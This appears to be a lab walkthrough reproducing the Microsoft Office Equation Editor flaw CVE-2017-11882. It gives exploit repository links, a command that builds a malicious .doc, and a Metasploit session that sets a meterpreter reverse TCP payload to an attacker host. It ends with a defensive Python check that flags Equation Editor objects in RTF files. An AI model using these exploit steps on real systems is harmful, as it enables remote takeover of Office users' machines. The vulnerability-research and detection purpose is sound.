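CVE-2017-11882 vulnerability: affected versions
Office 2003
Office 2007
Office 2010
Office 2013
Office 2016
Reproduction environment
Windows 7
Kali
Office 2016
Office 2016 share link: https://pan.baidu.com/s/15YrwY7_1OOFSgpsleS2O5A
Extraction code: d1lo
Download the components
Download: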
https://github.com/Ridter/CVE-2017-11882/
https://github.com/0x09AL/CVE-2017-11882-metasploit
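Copy CVE-2017-11882.rb into the directory /usr/share/metasploit-framework/modules/exploits/windows/smb
Test
Create a document that pops up the calculator
python Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o 1.doc
Put the document on the target machine and open it
Success
Reproducing with msf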
msf5 > search cve-2017-11882
Matching Modules
================
#  Name                                          Disclosure Date  Rank       Check  Description
-  ----                                          ---------------  ----       -----  -----------
0  exploit/windows/fileformat/office_ms17_11882  2017-11-15       manual     No     Microsoft Office CVE-2017-11882
1  exploit/windows/smb/cve_2017_11882            2017-11-21       excellent  No     Microsoft Office Word Equation Editor RCE
msf5 > use exploit/windows/smb/cve_2017_11882
msf5 exploit(windows/smb/cve_2017_11882) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/cve_2017_11882) > set LHOST 192.168.31.117
LHOST => 192.168.31.117
msf5 exploit(windows/smb/cve_2017_11882) > set URIPATH test
URIPATH => test
msf5 exploit(windows/smb/cve_2017_11882) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.31.117:4444
[*] Generating command with length 44
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
[*] Using URL: http://0.0.0.0:8080/test
The document is generated
Copy the document to the target machine and open it
msf5 exploit(windows/smb/cve_2017_11882) > sessions -i 1
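On the defensive side, RTF documents like the msf.rtf generated above can be triaged by checking whether the file embeds an Equation Editor object at all, regardless of what its \objclass label claims. The following Python check is an added example, not code from the original post or from either GitHub project; it assumes the OLE class name Equation.3 and the stream name Equation Native as markers, and the sample documents are constructed, header-only stand-ins with no payload.

```python
import re
import struct

MARKERS = (b"Equation.3", b"Equation Native")
OBJCLASS_RE = re.compile(r"\\objclass\s+([^}\\]+)")
OBJDATA_RE = re.compile(r"\\objdata([^}]*)")


def decode_objdata(blob):
    """Hex-decode an \\objdata body, skipping whitespace and other non-hex characters."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", blob)
    return bytes.fromhex(digits[: len(digits) // 2 * 2])  # drop a dangling nibble


def find_equation_objects(rtf_text):
    """Return (location, marker) pairs for every Equation Editor reference found."""
    hits = []
    for m in OBJCLASS_RE.finditer(rtf_text):
        name = m.group(1).strip()
        if name.lower().startswith("equation"):
            hits.append(("objclass", name))
    for m in OBJDATA_RE.finditer(rtf_text):
        data = decode_objdata(m.group(1))
        for marker in MARKERS:
            # Class name is ANSI in the OLE1 header; OLE2 stream names are UTF-16LE.
            if marker in data or marker.decode().encode("utf-16-le") in data:
                hits.append(("objdata", marker.decode()))
    return hits


def constructed_rtf(objclass, ole_class):
    """Constructed sample: OLE1 object header only, no native data, no payload."""
    cls = ole_class + b"\x00"
    header = struct.pack("<III", 0x0501, 2, len(cls)) + cls
    hexed = header.hex()
    body = hexed[:16] + "\n" + hexed[16:]  # hex split across lines
    return "{\\rtf1{\\object\\objemb{\\*\\objclass %s}{\\*\\objdata %s}}}" % (objclass, body)


LABELLED = constructed_rtf("Equation.3", b"Equation.3")
MISLABELLED = constructed_rtf("Word.Document.8", b"Equation.3")  # label lies, data does not
CLEAN = constructed_rtf("Excel.Sheet.8", b"Excel.Sheet.8")

if __name__ == "__main__":
    for name, doc in (("labelled", LABELLED), ("mislabelled", MISLABELLED), ("clean", CLEAN)):
        print(name, find_equation_objects(doc))
```

A hit only means the document would invoke the Equation Editor; it is a reason to quarantine and inspect the file, not proof of exploitation.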